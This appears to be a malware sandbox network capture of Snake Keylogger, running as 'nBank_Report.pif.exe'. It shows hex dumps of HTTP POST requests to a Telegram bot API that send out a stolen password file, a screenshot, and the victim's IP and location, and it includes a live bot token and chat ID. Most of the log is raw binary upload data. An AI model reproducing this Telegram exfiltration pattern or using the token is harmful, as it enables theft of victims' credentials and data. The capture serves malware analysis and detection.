                                              2024-09-26 09:34:05 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: a3 8f a8 f3 c2 6e 6e 1f cb d9 d3 e6 8b ec 63 cc 3c e3 7c 69 07 d2 ce 72 25 fe 88 7b 61 a8 b8 a4 1f 6b 69 95 e3 e7 e8 eb 96 5f 2f f2 40 c2 ce 0b c2 7a 4e e3 2c ea 0c 62 7e bf 5a 1a 4a fe f9 18 95 7e b4 bc 8e e6 59 ab 31 cf f2 93 70 43 be 49 f0 49 c4 f9 2a 3f 72 98 63 8d 17 86 9a f7 e2 cf af 51 9f b8 88 62 3e 3e 59 01 88 90 fb e8 f5 c9 fe 8e 4e e9 e6 2f da 7f 5c af 68 64 dd 24 44 dd b9 df 49 9d f7 de 96 ae 4c 8f a5 8d 1f b8 a8 79 c6 1f 12 30 ca 15 63 4a c3 3e 21 17 cc d5 31 cf d4 67 ec 1f 63 55 cc ef b7 10 12 6d cb 4d 24 cf 20 ca 89 62 bb 2a 91 ac 5b 2a d3 9f b2 7f d4 17 14 8b e4 dc 4a 10 4a 3f 4f 20 ed 86 11 c9 b8 28 4f 44 f9 93 20 92 7d 11 a1 f4 f3 04 52 6d 18 91 c4 5b 0a d1 6b 8c 43 24 fd 3c 91 b4 9b 24 91 f4 f3 44 a2 6f 10 b1 a0 5b 6e ec 67 b0 04 01 d8
                                              Data Ascii: nnc<|ir%{aki_/@zN,b~ZJ~Y1pCII*?rcQb>>YN/\hd$DILy0cJ>!1gcUmM$ b*[*JJ?O (OD }Rm[kC$<$Do[ng
                                              2024-09-26 09:34:05 UTC16355OUTData Raw: 61 3f e5 f8 bd 04 92 ce 1f df f5 92 0f 38 c6 4b ab 79 55 fb 69 5e 55 82 1a 93 e3 f7 5b 15 80 81 14 7b 21 11 4a b9 15 c4 cb b4 9d 45 24 e6 46 cd 5b 2a 91 f4 f3 c4 52 6f 1c ec bd 2f 23 ab 02 d0 7e 8e 63 30 6f 8f 40 ea 8d 43 24 eb 96 83 5a e4 0d a2 16 74 0b cd 2f 99 40 ca ad 24 a1 e0 73 0c bc 5c 44 f2 af 8c a7 ca 25 22 35 cf 77 01 98 2b f4 0a dd 73 6d 3f 2f 00 c5 79 36 06 57 15 d8 56 06 9e 6f 20 f7 2e b4 ff c6 6f 7a 3a 75 37 73 bb f0 33 69 fa e2 67 d3 ec 45 cf a6 35 17 53 15 f8 cb b4 7e 6b 4a bb 6d 4b 69 dd 96 94 d6 6c 7e 36 4d 9d 6f f9 bc 8e 7f 6e 20 b2 2f 0b 3f 27 fa 90 81 12 84 5e fe 65 8a cc 3b e3 c1 81 48 04 0e 22 94 7a e3 10 48 bb 49 12 49 3f 4f 24 fd 3c a1 f4 73 44 cf fd f3 44 72 6f 14 06 09 40 78 3e 09 c0 2c e9 5c f5 5f 4d 2d f4 16 4b 24 01 01 09 58
                                              Data Ascii: a?8KyUi^U[{!JE$F[*Ro/#~c0o@C$Zt/@$s\D%"5w+sm?/y6WVo .oz:u7s3igE5S~kJmKil~6Mon /?'^e;H"zHII?O$<sDDro@x>,\_M-K$X
                                              2024-09-26 09:34:07 UTC389INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:07 GMT
                                              Content-Type: application/json
                                              Content-Length: 1230
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.1049755149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:08 UTC348OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce00020bde834
                                              Host: api.telegram.org
                                              Content-Length: 546
                                              Connection: Keep-Alive
                                              2024-09-26 09:34:08 UTC546OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 30 30 32 30 62 64 65 38 33 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 62 72 6f 6b 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 38 35 39 34 38 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 32 36 2f 30 39 2f 32 30 32 34 20 2f 20 30 35 3a 33 33 3a 32 31 0d 0a 43 6c 69 65 6e 74 20 49 50 3a 20 38
                                              Data Ascii: --------------------------8dce00020bde834Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:585948Date and Time: 26/09/2024 / 05:33:21Client IP: 8
                                              2024-09-26 09:34:09 UTC388INHTTP/1.1 200 OK
                                              Server: nginx/1.18.0
                                              Date: Thu, 26 Sep 2024 09:34:08 GMT
                                              Content-Type: application/json
                                              Content-Length: 505
                                              Connection: close
                                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                              2024-09-26 09:34:09 UTC505INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 33 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 32 34 30 31 32 38 34 32 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 58 6d 61 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6d 61 6e 75 5f 4c 6f 67 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 33 39 34 35 35 30 32 34 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 20 5c 75 64 38 33 64 5c 75 64 63 30 38 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 57 61 6c 74 6f 6e 36 37 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 32 37 33 34 33 32 34 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22
                                              Data Ascii: {"ok":true,"result":{"message_id":6339,"from":{"id":6240128422,"is_bot":true,"first_name":"Xmas","username":"Mmanu_LogBot"},"chat":{"id":1394550246,"first_name":"Walton \ud83d\udc08","username":"Walton675","type":"private"},"date":1727343248,"document":{"


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              28192.168.2.1049756149.154.167.2204433276C:\Users\user\Desktop\nBank_Report.pif.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-26 09:34:09 UTC694OUTPOST /bot6240128422:AAHdz597lINt6XxvVOS5rAYWbhR8tIQ_B-U/sendDocument?chat_id=1394550246&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:585948%0D%0ADate%20and%20Time:%2026/09/2024%20/%2005:33:21%0D%0AClient%20IP:%208.46.123.33%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20%0D%0ARegion%20Code:%20%0D%0ACity:%20%0D%0ATimeZone:%20America/Chicago%0D%0ALatitude:%2037.751%0D%0ALongitude:%20-97.822%0D%0AStub%20Version:%205.1 HTTP/1.1
                                              Content-Type: multipart/form-data; boundary=------------------------8dce01a03cfce7f
                                              Host: api.telegram.org
                                              Content-Length: 673762
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 65 30 31 61 30 33 63 66 63 65 37 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 55 73 65 72 73 5c 62 72 6f 6b 5c 44 6f 63 75 6d 65 6e 74 73 5c 53 6e 61 6b 65 4b 65 79 6c 6f 67 67 65 72 5c 53 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00
                                              Data Ascii: --------------------------8dce01a03cfce7fContent-Disposition: form-data; name="document"; filename="C:\Users\user\Documents\SnakeKeylogger\Screenshot.png"Content-Type: application/x-ms-dos-executablePNGIHDRCsRGB
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: 70 2b 00 3f 5d fd f6 de fd 43 91 37 57 22 89 b7 ae 38 f1 c4 13 ab 17 7f fb db 50 fc c1 3b be fb 50 8f dc fb ef 6b ee ac 3e 76 ce 23 d5 0f 7e f2 74 96 7c 79 4c 7c ec ec 87 73 4e 75 af 3d fa 9e d9 02 b0 91 7f ad 00 3c fc f0 50 e0 cd 97 45 01 b8 b0 84 12 6f 3e 2c 0a c0 b1 88 a4 de 38 44 d2 cf 89 a4 9f 13 49 3f 27 92 7d 83 88 e4 de 28 bc 54 02 50 44 72 6f 14 22 f9 07 bf 2f 02 50 eb 45 01 18 f3 fb 2e 00 a3 6b c1 4e 17 a9 37 00 c9 3f 51 0a c0 48 fa 39 4b 02 d9 e7 44 e2 cf 51 27 60 3f 4a d1 27 fa c5 95 f3 f5 30 01 18 31 f5 d6 9b 7a e8 97 ef 27 02 3d ee 02 50 12 50 f3 48 f4 0d 93 80 3d f9 37 5d df 8a 3f 97 80 8c ea 06 e4 ad c0 ed 4b 39 9a 8e 40 31 aa 04 74 b1 87 ec 93 50 94 08 24 5e 4a 45 e6 fe 0c 40 49 c0 ee 6e 57 65 3a ab af 6c e5 1e e8 3a b0 83 e4 53 5e d2 cf
                                              Data Ascii: p+?]C7W"8P;Pk>v#~t|yL|sNu=<PEo>,8DI?'}(TPDro"/PE.kN7?QH9KDQ'`?J'01z'=PPH=7]?K9@1tP$^JE@InWe:l:S^
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: 27 99 c7 1c 5c e2 b5 22 af 41 39 e5 d5 fd a7 58 b9 8f b7 01 23 f5 b8 ee 2b f1 27 d1 e7 73 49 3f 09 43 49 43 64 9e 04 a0 3a 00 91 7d 8c 90 af f9 36 22 b0 ec 0a 24 87 dc 93 d8 93 00 94 dc 23 07 ca a9 03 d0 af 00 4b fc 39 2e e9 94 97 d8 5b b1 7d fa 6e 29 a7 1a 09 c3 72 af f6 79 9e 98 20 c6 35 60 c9 39 5d fb 45 ca b9 00 94 d4 d3 5c 48 f0 11 77 d9 a7 5a c5 bd ab 50 67 13 17 ea f4 03 e6 92 74 c8 39 49 3d e5 5d 00 32 92 07 f6 d1 d1 c7 28 c1 47 2d 75 c4 a9 25 a6 33 34 47 14 ea 85 1f 92 76 42 02 2e 5a 4b d2 29 ee 35 ea 1c 64 2c cf 50 8d f6 e8 0c cd 91 7c 82 b5 ea b8 fa db d9 f0 dc 3c d7 77 05 e6 48 36 90 84 73 11 07 08 40 09 3e 72 de a9 a7 7a 9d 51 9e a3 b5 ce 61 ae ce 3e ce d4 da af 14 eb 5c c6 dc 1d b8 71 fa f9 37 48 bf af a6 e3 0f f1 c7 a8 39 42 cf 5f f4 21 d9
                                              Data Ascii: '\"A9X#+'sI?CICd:}6"$#K9.[}n)ry 5`9]E\HwZPgt9I=]2(G-u%34GvB.ZK)5d,P|<wH6s@>rzQa>\q7H9B_!
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: c5 5c bf f8 a4 89 a4 9f 13 49 3f 27 92 78 f3 21 92 78 f3 21 92 7e 4e 24 f4 c6 21 92 7a e3 10 49 be 41 f4 c8 bb 49 10 49 bd 71 08 84 5f 49 24 ee 26 45 24 fd 9c 48 e4 cd 95 59 02 30 51 0a bd 88 1e a1 d7 27 de 8f 48 f2 0d 22 92 7c 83 88 44 de 5c 79 b5 09 c0 51 98 25 f4 02 e9 e7 cc aa 1f 83 59 02 30 11 8b bd 51 99 bf 00 9c fe c8 dc c4 9f 70 29 17 11 9d e9 f9 ee 87 7a c9 b1 40 fe 95 cc 74 01 f6 8a 3f 11 c9 bc b9 10 49 3f 27 92 7c 83 90 f8 eb be e7 c7 99 48 fa 39 33 9d 7e 33 b8 cc 9b 3f b3 a5 9f d3 4f 00 82 64 1e 44 79 70 e1 57 0a 40 40 f4 2d d9 2f 7d 4e 42 02 b0 fb 96 54 97 46 49 c1 be a4 fd 12 7d fd 04 a0 84 9f bf 10 c4 c9 12 0f 09 87 b8 43 c4 21 e9 10 70 29 4e 87 a0 72 fd 68 3b fe 4c de 49 e8 29 5e a2 9c ba 0a 15 f3 1a 09 be 48 00 ea 6a b1 04 a0 04 1f a3 cf
                                              Data Ascii: \I?'x!x!~N$!zIAIIq_I$&E$HY0Q'H"|D\yQ%Y0Qp)z@t?I?'|H93~3?OdDypW@@-/}NBTFI}C!p)Nrh;LI)^Hj
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: ed 34 99 f4 8b b4 e2 6e 59 06 91 37 23 be 88 cd 08 40 a9 82 2f 89 4f 90 48 bc ad b2 1d 02 30 93 7d f3 98 55 05 b8 88 4c e0 6d 95 4c f4 cd 22 93 7d 19 ad d8 db 28 99 f4 8b 64 d2 2f 12 05 de 2c 26 84 5e 13 8f 63 63 13 f9 89 e4 5b c4 13 f5 08 30 42 30 93 7c f3 b0 02 30 ca bf 09 09 b8 41 01 18 e3 91 c3 21 00 db d8 20 f9 02 5b 11 80 b3 50 0c 9a ab fc 9b 14 80 eb c2 2e 42 3c ce c5 ea 3d 65 9f 79 31 e6 9a 98 e3 7c 46 94 75 ad c4 53 de 01 7d c7 d9 1a 89 73 71 5e 01 48 6b cc 4a c2 2a 02 7b d1 57 ab fd 7a f9 37 7a d1 75 c3 b1 e0 f6 fb 7f 11 65 1d ad 63 5a 05 60 94 80 cc 29 ff e2 b7 04 33 c8 9f 75 c4 97 3e b1 bd bd 00 8c 79 10 e5 df 2c 10 81 b1 2a 90 18 55 81 11 e3 e6 0b 63 04 22 22 0f b9 67 c5 1f 47 81 11 7c c8 3d 50 fe 99 07 cc 03 fd a9 5b 7b 0b ca 3f 2b fa 3c 22
                                              Data Ascii: 4nY7#@/OH0}ULmL"}(d/,&^cc[0B0|0A! [P.B<=ey1|FuS}sq^HkJ*{Wz7zuecZ`)3u>y,*Uc""gG|=P[{?+<"
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: fe 6b dd 23 df f8 f5 ee d1 6f bc b9 7b f4 5b bf d5 fd cf 7f f4 cd f4 d9 db 41 26 fd 96 21 13 7e 2d 0a c0 4c d6 ed 14 1b 96 80 a9 fc 83 5e d0 4d 80 f4 0b 6d 2f eb a2 c0 9b 16 79 0d ee 75 fe dd f5 7b 7d fc 7e 26 2e f3 80 f8 cd 41 de 71 e2 9b 83 48 c0 f2 f7 2e f2 af 90 dd 36 cc 0d c3 c8 3e a4 5f 94 80 8a 40 a9 c7 85 b9 d9 b8 3c 73 ed bc 7b ca 3f 5b e5 7d e2 8d c2 f1 9b 81 f1 3b 82 85 ad 0a c0 54 e6 2d 60 ad 3c 0f 26 e2 89 74 9b 85 47 86 b7 f3 e8 f0 da 99 e5 bd e6 90 c9 bc cd 90 c9 3f c8 a4 dd 76 92 49 bf 48 26 ed b6 93 69 a1 b7 2c e5 e7 98 c7 3b a7 a5 5f 64 57 00 96 3d e6 b2 2e fb 32 32 e9 17 59 24 00 b7 5b 02 3e d1 04 e0 9e 5f fb 76 a5 15 7c c6 67 cd 0b f2 0f 32 e9 97 81 f0 b3 6d c9 04 20 3c 16 02 70 a3 7b ac fd dc a4 f0 6b c9 a4 5f 24 93 7e 91 9d 16 80 32
                                              Data Ascii: k#o{[A&!~-L^Mm/yu{}~&.AqH.6>_@<s{?[};T-`<&tG?vIH&i,;_dW=.22Y$[>_v|g2m <p{k_$~2
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: fd dd d0 79 13 b0 52 10 d1 47 65 9f 52 cf 3e 72 4f f1 47 4c 29 48 cb d8 98 15 7f c2 18 e9 47 5b 05 df a9 65 bf e7 8f e5 1f 2d 39 cc 73 6c f8 e0 8b cb cf 56 e6 bd 04 84 2a 3d 5a 04 a0 62 4f a9 27 cc 2b f2 5c 47 5f c1 c7 1e 62 9e c4 79 fa ac 45 f4 71 b9 08 d0 8f 42 f0 e0 0b cb ef b3 11 7e f4 15 82 75 dc cb 3a 5a a5 1e ad 55 7f ce 29 ff 84 b9 b6 da 4f 8c 21 17 ad f8 43 fe 29 00 db a3 c0 7e 1f 90 98 b2 0e 81 c7 85 1d de f6 3b 08 be 5e 02 22 dd 20 ca 3c 45 60 a4 9d 57 0e 3a 87 e0 43 00 5a f9 a7 fc 53 0c 46 39 28 4a 42 f0 7d ac 4a e4 9d a2 00 ac 92 af af 56 04 e5 df 10 3b 66 2c f2 a2 e4 43 e6 f9 0d c0 4c ec 39 36 df 18 90 0f 4a 3e e7 b3 9c 4a c9 43 bc 29 f9 40 79 c7 1c fd 38 6e f1 db 81 5c 26 c2 98 3e 2d 6b 10 7d 1c f3 a5 8f f0 23 4e cc e7 b0 27 63 f7 6a 61 ae
                                              Data Ascii: yRGeR>rOGL)HG[e-9slV*=ZbO'+\G_byEqB~u:ZU)O!C)~;^" <E`W:CZSF9(JB}JV;f,CL96J>JC)@y8n\&>-k}#N'cja
                                              2024-09-26 09:34:09 UTC16355OUTData Raw: c8 39 84 9e 44 1d 73 48 3c 49 3d 0f 79 eb f7 b6 9f b3 b5 5a a7 be 17 7c ac a7 95 44 64 5e e3 a6 ff 25 6b 7b 15 7f 5e fc 51 f1 a7 be c6 42 eb 26 2e 00 21 12 65 cf 57 22 e9 e7 e9 97 6d f3 89 d6 8c 43 b4 e7 78 20 eb 96 83 66 7f 2f 00 5f c8 12 30 92 7f 10 ca be 88 40 f6 45 44 92 6e 18 d1 1e 9e 68 8d 67 90 88 f3 92 6e 39 a9 5f 77 a5 89 a4 9f 27 96 7e 1e fb 1c 4b a0 53 d1 c6 2f b6 f7 e7 e8 5e 34 08 fb 39 8f 40 28 03 81 8a bd 8b ec cf fb 20 bc 18 f4 14 39 88 ec 9b bd 84 8b 43 1a 09 38 f7 89 94 f1 95 81 d3 5b 79 76 a0 fd 7d 97 5f cf 3e 5b 3e 22 ac 8a 40 a4 20 7d e3 02 fb 3e cf 6f c8 63 71 8e e5 0d 22 92 76 02 49 17 c5 c7 a1 12 7e 35 a1 f4 f3 04 d2 ad 9f de 05 1f 8b 23 da 73 74 22 a9 37 0e 5e f4 0d 62 55 00 da eb ae 0a c0 b1 58 39 01 b8 44 4e 89 c5 de b8 f8 63 c1
                                              Data Ascii: 9DsH<I=yZ|Dd^%k{^QB&.!eW"mCx f/_0@EDnhgn9_w'~KS/^49@( 9C8[yv}_>[>"@ }>ocq"vI~5#st"7^bUX9DNc
